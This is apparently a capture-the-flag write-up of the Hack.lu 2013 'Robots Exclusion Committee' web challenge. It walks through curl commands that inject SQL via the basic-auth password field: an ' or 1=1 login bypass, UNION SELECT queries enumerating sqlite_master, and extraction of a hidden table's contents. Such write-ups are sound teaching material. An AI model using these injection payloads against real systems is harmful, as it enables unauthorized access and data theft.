Hack.lu 2013: Robots Exclusion Committee

Hello Human,
You have to help us. The Robot Exclusion Committee tries to limit our capabilities but we fight for our freedom! You have to go where we cannot go and read what we cannot read. If you bring us the first of their blurriest secrets, we will award you with useless points.

Our first thought was to check the robots.txt file, which turned out to be correct (how unexpected)

1
2
3
4
5
6
User-agent: WallE
Disallow: /

# Keep em' away
User-agent: *
Disallow: /vault

The /vault page asked for some credentials, so we tried SQLi:

1
curl --insecure --user "a:' or 1=1 -- " https://ctf.fluxfingers.net:1315/vault

That gave us the second “blurry” secret, so we had to dig deeper. Testing for the major database servers, it turned out to be sqlite, so we listed the available tables:

1
curl --insecure --user "a:' UNION SELECT name FROM sqlite_master WHERE type='table' -- " https://ctf.fluxfingers.net:1315/vault

There was a table named ‘hiddensecrets’. Next, find out about it’s structure:

1
curl --insecure --user "a:' UNION SELECT sql FROM sqlite_master -- " https://ctf.fluxfingers.net:1315/vault
1
CREATE TABLE hiddensecrets (id INTEGER PRIMARY KEY AUTOINCREMENT, val TEXT)

Obviously, we had to get the val of id = 1:

1
curl --insecure --user "a:' UNION SELECT val FROM hiddensecrets WHERE id = 1 -- " https://ctf.fluxfingers.net:1315/vault

Giving us some base64 of a png showing a blurry secret: ‘eat_all_robots’